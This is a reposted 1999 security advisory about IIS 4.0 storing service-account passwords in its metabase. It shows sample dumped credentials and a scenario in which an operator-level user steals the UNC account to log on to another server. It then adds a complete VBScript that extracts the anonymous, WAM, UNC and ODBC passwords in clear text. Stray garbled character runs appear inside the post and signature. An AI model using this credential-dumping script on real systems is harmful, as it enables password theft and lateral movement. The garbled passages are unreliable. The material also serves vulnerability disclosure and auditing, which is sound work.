According to earlier findings, Windows NT passwords are not kept in a single file in simply encrypted form, as on Windows 95, but are scrambled and hidden in seven different places. This newly published article tells us about the eighth place where Windows NT passwords are hidden.

Date: Mon, 22 Feb 1999 11:26:41 +0100
From: Patrick CHAMBET <pchambet@club-internet.fr>
To: sans@clark.net
Subject: Alert: IIS 4.0 metabase can reveal plaintext passwords
Hi all,

We knew that Windows NT passwords are stored in 7 different places across
the system. Here is an 8th place: the IIS 4.0 metabase.

IIS 4.0 uses its own configuration database, named "metabase", which can
be compared to the Windows Registry: the metabase is organised in Hives,
Keys and Values. It is stored in the following file:

C:\WINNT\system32\inetsrv\MetaBase.bin
The IIS 4.0 metabase contains these passwords:
- IUSR_ComputerName account password (only if you have typed it in the
MMC)
- IWAM_ComputerName account password (ALWAYS!)
- UNC username and password used to connect to another server if one of
your virtual directories is located there.
- The user name and password used to connect to the ODBC DSN called
"HTTPLOG" (if you chose to store your logs in a database).
Note that the usernames are in unicode, clear text, that the passwords are
scrambled in the metabase.ini file, and that only Administrators and SYSTEM
have permissions on this file.

BUT a few lines of script in a WSH script or in an ASP page allow one to print
these passwords in CLEAR TEXT.

The user name and password used to connect to the Logs DSN could allow a
malicious user to delete traces of his activities on the server.

Obviously this represents a significant risk for Web servers that allow
logons and/or remote access, although I have not yet seen any exploit of the
problem I am reporting. Here is an example of what can be gathered:
"
IIS 4.0 Metabase
(c) Patrick Chambet 1998 - pchambet@club-internet.fr

--- UNC User ---
UNC User name: 'Lou'
UNC User password: 'Microsoft'
UNC Authentication Pass Through: 'False'

--- Anonymous User ---
Anonymous User name: 'IUSR_SERVER'
Anonymous User password: 'x1fj5h_iopNNsp'
Password synchronization: 'False'

--- IIS Logs DSN User ---
ODBC DSN name: 'HTTPLOG'
ODBC table name: 'InternetLog'
ODBC User name: 'InternetAdmin'
ODBC User password: 'xxxxxx'

--- Web Applications User ---
WAM User name: 'IWAM_SERVER'
WAM User password: 'Aj8_g2sAhjlk2'

Default Logon Domain: ''
"
For example, you can imagine the following scenario:
A user Bob is allowed to log on only to a server hosting IIS 4.0, say
server (a). He need not be an Administrator. He can be for example
an IIS 4.0 Web Site Operator. Then, he launches a WSH script that extracts
the login name and password of the account used to access a virtual
directory located on another server, say (b).
Now, Bob can use this login name and password to log on to server (b).
And so forth...
# r" {1 B5 z+ t$ g' [& rMicrosoft was informed of this vulnerability.
_______________________________________________________________________
Patrick CHAMBET - pchambet@club-internet.fr
MCP NT 4.0
Internet, Security and Microsoft solutions
e-business Services
3 j. J" R& E0 B( \( F% u5 JIBM Global Services
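The "few lines of script" the post refers to, as an added example that is not Chambet's own code: a WSH (VBScript) script that reads the credential-bearing metabase properties through the IIS ADSI provider (IIS://) and prints them in the same layout as the output quoted above. The property names (UNCUserName, UNCPassword, UNCAuthenticationPassthrough, AnonymousUserName, AnonymousUserPass, AnonymousPasswordSync, LogOdbcDataSource, LogOdbcTableName, LogOdbcUserName, LogOdbcPassword, WAMUserName, WAMUserPass, DefaultLogonDomain) are the documented IIS metabase properties; the host name "localhost" and web site instance "1" (the Default Web Site) are assumptions. Whether each Get succeeds depends on the caller's rights on those metabase keys, and the post's point is that a Web Site Operator, not only an Administrator, passes that check.

```vbscript
' Added example, not part of the original post: dump the credential-bearing
' properties of the IIS 4.0 metabase via the IIS ADSI provider (IIS://).
' Assumptions: the script runs on the IIS host, the server is reachable as
' "localhost" and the web site of interest is instance 1 (Default Web Site).
Option Explicit

Const SERVER = "localhost"
Const SITE_ID = "1"

' Read one metabase property. A property that is neither set on the node
' nor inherited from a parent raises an error; report it instead of
' aborting the whole dump.
Function ReadProp(node, propName)
    On Error Resume Next
    ReadProp = CStr(node.Get(propName))
    If Err.Number <> 0 Then
        ReadProp = "<not set>"
        Err.Clear
    End If
End Function

' Print one "label: 'value'" line in the layout used by the post's output.
Sub Show(label, value)
    WScript.Echo label & ": '" & value & "'"
End Sub

Dim svc, site, root
Set svc  = GetObject("IIS://" & SERVER & "/W3SVC")                       ' IIsWebService: WAM (IWAM_*) credentials live here
Set site = GetObject("IIS://" & SERVER & "/W3SVC/" & SITE_ID)            ' IIsWebServer: ODBC logging settings live here
Set root = GetObject("IIS://" & SERVER & "/W3SVC/" & SITE_ID & "/Root")  ' IIsWebVirtualDir: anonymous and UNC credentials

WScript.Echo "IIS 4.0 Metabase (added example)"
WScript.Echo ""
WScript.Echo "--- UNC User ---"
Show "UNC User name", ReadProp(root, "UNCUserName")
Show "UNC User password", ReadProp(root, "UNCPassword")
Show "UNC Authentication Pass Through", ReadProp(root, "UNCAuthenticationPassthrough")
WScript.Echo ""
WScript.Echo "--- Anonymous User ---"
Show "Anonymous User name", ReadProp(root, "AnonymousUserName")
Show "Anonymous User password", ReadProp(root, "AnonymousUserPass")
Show "Password synchronization", ReadProp(root, "AnonymousPasswordSync")
WScript.Echo ""
WScript.Echo "--- IIS Logs DSN User ---"
Show "ODBC DSN name", ReadProp(site, "LogOdbcDataSource")
Show "ODBC table name", ReadProp(site, "LogOdbcTableName")
Show "ODBC User name", ReadProp(site, "LogOdbcUserName")
Show "ODBC User password", ReadProp(site, "LogOdbcPassword")
WScript.Echo ""
WScript.Echo "--- Web Applications User ---"
Show "WAM User name", ReadProp(svc, "WAMUserName")
Show "WAM User password", ReadProp(svc, "WAMUserPass")
WScript.Echo ""
Show "Default Logon Domain", ReadProp(root, "DefaultLogonDomain")
```

Run it with `cscript dumpmetabase.vbs` on the IIS host; in an ASP page the same GetObject calls work with Response.Write in place of WScript.Echo. The property list doubles as an audit checklist: any non-empty UNCPassword or LogOdbcPassword is a credential readable at operator level, so the account behind it should be a dedicated, least-privilege one rather than an account that is also valid on server (b).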